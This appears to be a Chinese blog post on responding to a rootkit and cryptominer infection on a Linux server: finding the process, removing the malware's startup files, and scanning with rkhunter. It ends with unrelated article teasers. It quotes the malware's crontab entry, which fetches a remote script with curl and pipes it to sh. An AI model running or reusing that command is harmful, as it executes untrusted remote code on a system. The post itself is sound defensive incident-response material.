伺服器遭 rootkit不慌

2021-09-27 05:37:08 字數 1780 閱讀 8524

1.介紹:rootkit是linux最常見的***後門工具,主要通過替換系統檔案達到特殊目的。主要有兩種型別:檔案級別和核心級別。

2.現象及處理思路:(程序;計畫任務;可疑檔案)

通過top,檢視一條占用cpu將近300%的一條程序,程序名為vtthh1,隨後殺掉程序及程序的執行檔案,過一會程序檔案又出現,程序自動執行起來。

懷疑有計畫任務。檢查/var/spool/cron/及/etc/crontab中沒有發現任務。

在/var/spool/cron/crontab/root發現一條語句:

/bin/sh -c (/usr/bin/uwd***2||/usr/libexec/uwd***2||/usr/local/bin/uwd***2||/tmp/uwd***2||curl -m180 -fssl -q -t180 -o- | sh

然後通過ps -ef 來檢視是否有不正常程序。發現了乙個莫名的程序/usr/bin/uwd***2,果不其然是因為這個程序為父程序,隨後把這個程序及程序的執行檔案殺掉,再沒有出現vtthh1程序。

查殺病毒檔案:繼續查詢系統可疑檔案,系統的啟動檔案rc.local,在/etc/init.d/目錄檢視,發現奇怪的dbsecurityspt,selinux.這兩個檔案在正常的系統下是沒有的,初步判斷是異常檔案。

查詢更多的可疑檔案,然後刪除。(刪除不掉處理,通過lsattr 檢視檔案加權處理,因此通過chattr -i 來取消加權)

rm -rf /usr/bin/bsd-port

rm -f /etc/rc.d/init.d/dbsecurityspt

rm -f /etc/rc.d/init.d/selinux

rm -f /etc/rc.d/rc1.d/s97dbsecurityspt

rm -f /etc/rc.d/rc2.d/s97dbsecurityspt

rm -f /etc/rc.d/rc3.d/s97dbsecurityspt

rm -f /etc/rc.d/rc1.d/s99selinux

rm -f /etc/rc.d/rc2.d/s99selinux

rm -f /etc/rc.d/rc3.d/s99selinux

3.安全加固4.看是否rootkit,使用檢測工具rkhunter

1,安裝rkhunter,

yum install epel-release

yum install rkhunter

rkhunter命令的引數較多

rkhunter --help

常用的幾個引數選項:

綠色表示沒有問題,紅色,要引起關注了。

程式自動執行檢測:rkhunter --check --skip-keypress

rkhunter擁有並維護著乙個包含rootkit特徵的資料庫,然後根據此資料庫來檢測系統中的rootkits.對此資料庫程序公升級,rkhunter --update

教你鑑別伺服器是否遭黑客入侵

首先,根據表象初步判斷 醫生判斷乙個病人是否感冒了,可以從是否流鼻涕 是否鼻塞 是否附帶咳嗽等表象進行判斷,而要想判斷系統是否感染了流氓軟體,也可以從表象來判斷。當系統感染了流氓軟體後一般有以下幾種可疑跡象可以通過感覺來判斷 系統執行速度越來越慢 安裝了病毒防火牆,系統中最近也並沒安裝什麼軟體,但是...

伺服器安裝Linux伺服器

新辦公需要搭建一台伺服器,之前也沒有怎麼搞過,不過有一些了解,於是和同事一起嘗試安裝一下伺服器。本人使用ultraiso燒錄u盤,系統檔案是centos 6.6 x86 64 bin 1.ios,使用urtraiso開啟iso檔案,然後如下圖 接著就可以寫入,u盤會被格式化的,注意備份,等待寫入就可...

mysql udp伺服器 UDP伺服器

傳輸層主要應用的協議模型有兩種,一種是tcp協議,另外一種則是udp協議。tcp協議在網路通訊中佔主導地位,絕大多數的網路通訊借助tcp協議完成資料傳輸。但udp也是網路通訊中不可或缺的重要通訊手段。相較於tcp而言,udp通訊的形式更像是發簡訊。不需要在資料傳輸之前建立 維護連線。只專心獲取資料就...